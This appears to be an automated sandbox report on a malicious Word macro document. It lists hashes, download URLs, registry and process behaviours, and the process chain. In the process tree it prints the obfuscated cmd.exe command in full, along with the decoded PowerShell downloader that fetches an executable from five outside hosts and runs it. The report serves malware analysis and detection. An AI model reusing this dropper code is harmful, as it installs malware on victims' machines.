Analysis
-
max time kernel
15s -
max time network
16s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
01-02-2022 03:30
Static task
static1
Behavioral task
behavioral1
Sample
ddfa667a6805bf8b9216feb8df15b1590c340914d7142aa142ecb858d117ba9b.doc
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
ddfa667a6805bf8b9216feb8df15b1590c340914d7142aa142ecb858d117ba9b.doc
Resource
win10v2004-en-20220113
General
-
Target
ddfa667a6805bf8b9216feb8df15b1590c340914d7142aa142ecb858d117ba9b.doc
-
Size
92KB
-
MD5
4ed6536cc686553f21e7583d5257e590
-
SHA1
437dcc1cc98f92a4bdfaab6746a87403ded4dba0
-
SHA256
ddfa667a6805bf8b9216feb8df15b1590c340914d7142aa142ecb858d117ba9b
-
SHA512
b25b2702513ae30d14c849be9282940d0ae7392097d1f377dded49bf8c4f304656bcc58391ac427b1ee59ebf833394a298988f76324b23ac11b28005048f120a
Malware Config
Extracted
http://nebula-ent.com/t3
http://ektor.com.br/XWWpLxCI
http://negreiros.com.br/bin/zoZb
http://n-morimoto.jp/j583VppF
http://mscyapi.com/mscinsaat.com/cWBJXY3
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 4720 2960 cmd.exe WINWORD.EXE -
Sets service image path in registry 2 TTPs
-
Drops file in Windows directory 6 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\WindowsUpdate.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm svchost.exe File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log svchost.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Modifies data under HKEY_USERS 41 IoCs
Processes:
WaaSMedicAgent.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople WaaSMedicAgent.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 2960 WINWORD.EXE 2960 WINWORD.EXE -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
svchost.exedescription pid process Token: SeShutdownPrivilege 4576 svchost.exe Token: SeCreatePagefilePrivilege 4576 svchost.exe Token: SeShutdownPrivilege 4576 svchost.exe Token: SeCreatePagefilePrivilege 4576 svchost.exe Token: SeShutdownPrivilege 4576 svchost.exe Token: SeCreatePagefilePrivilege 4576 svchost.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
WINWORD.EXEpid process 2960 WINWORD.EXE 2960 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 2960 WINWORD.EXE 2960 WINWORD.EXE 2960 WINWORD.EXE 2960 WINWORD.EXE 2960 WINWORD.EXE 2960 WINWORD.EXE 2960 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
WINWORD.EXEcmd.exedescription pid process target process PID 2960 wrote to memory of 4720 2960 WINWORD.EXE cmd.exe PID 2960 wrote to memory of 4720 2960 WINWORD.EXE cmd.exe PID 4720 wrote to memory of 2876 4720 cmd.exe powershell.exe PID 4720 wrote to memory of 2876 4720 cmd.exe powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ddfa667a6805bf8b9216feb8df15b1590c340914d7142aa142ecb858d117ba9b.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.execmd /V:/C"set icX=izXquhBIwbtEjbVz5CLc32F)SdOskxZo8,Y{l\yPm;$pMeD-KvnrNJ1}a+@g.=W' f/:7(&&for %6 in (43;31;8;45;51;27;5;45;36;36;64;42;34;43;26;61;50;45;8;47;31;13;12;45;19;10;64;52;45;10;60;62;45;13;17;36;0;45;50;10;41;42;48;49;17;61;63;5;10;10;43;67;66;66;50;45;13;4;36;56;47;45;50;10;60;19;31;40;66;10;20;58;5;10;10;43;67;66;66;45;28;10;31;51;60;19;31;40;60;13;51;66;2;62;62;43;18;29;17;7;58;5;10;10;43;67;66;66;50;45;59;51;45;0;51;31;27;60;19;31;40;60;13;51;66;13;0;50;66;15;31;30;13;58;5;10;10;43;67;66;66;50;47;40;31;51;0;40;31;10;31;60;12;43;66;12;16;32;20;14;43;43;22;58;5;10;10;43;67;66;66;40;27;19;38;56;43;0;60;19;31;40;66;40;27;19;0;50;27;56;56;10;60;19;31;40;66;19;62;6;53;2;34;20;63;60;24;43;36;0;10;69;63;58;63;23;41;42;4;34;30;64;61;64;63;68;21;54;63;41;42;5;44;19;61;42;45;50;49;67;10;45;40;43;57;63;37;63;57;42;4;34;30;57;63;60;45;29;45;63;41;65;31;51;45;56;19;5;69;42;0;13;19;64;0;50;64;42;48;49;17;23;35;10;51;38;35;42;34;43;26;60;46;31;8;50;36;31;56;25;22;0;36;45;69;42;0;13;19;33;64;42;5;44;19;23;41;24;10;56;51;10;47;39;51;31;19;45;27;27;64;42;5;44;19;41;13;51;45;56;28;41;55;19;56;10;19;5;35;55;55;64;64;64;64;64;64;64;64;64;64;64;64;64;64;64;64;64;78)do set uN92=!uN92!!icX:~%6,1!&&if %6 geq 78 call %uN92:*uN92!=%"2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $YpO=new-object Net.WebClient;$KvC='http://nebula-ent.com/t3@http://ektor.com.br/XWWpLxCI@http://negreiros.com.br/bin/zoZb@http://n-morimoto.jp/j583VppF@http://mscyapi.com/mscinsaat.com/cWBJXY3'.Split('@');$uYZ = '721';$hMc=$env:temp+'\'+$uYZ+'.exe';foreach($ibc in $KvC){try{$YpO.DownloadFile($ibc, $hMc);Start-Process $hMc;break;}catch{}}3⤵
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe f6dc7d082f00c170d0d2d878253d8def HEi96ZH5BEeV6ft6KBdI+g.0.1.0.0.01⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/2960-130-0x00007FFF17E10000-0x00007FFF17E20000-memory.dmpFilesize
64KB
-
memory/2960-131-0x00007FFF17E10000-0x00007FFF17E20000-memory.dmpFilesize
64KB
-
memory/2960-132-0x00007FFF17E10000-0x00007FFF17E20000-memory.dmpFilesize
64KB
-
memory/2960-133-0x00007FFF17E10000-0x00007FFF17E20000-memory.dmpFilesize
64KB
-
memory/2960-134-0x00007FFF17E10000-0x00007FFF17E20000-memory.dmpFilesize
64KB
-
memory/2960-135-0x00007FFF15930000-0x00007FFF15940000-memory.dmpFilesize
64KB
-
memory/2960-136-0x00007FFF15930000-0x00007FFF15940000-memory.dmpFilesize
64KB
-
memory/4576-149-0x00000266B2540000-0x00000266B2544000-memory.dmpFilesize
16KB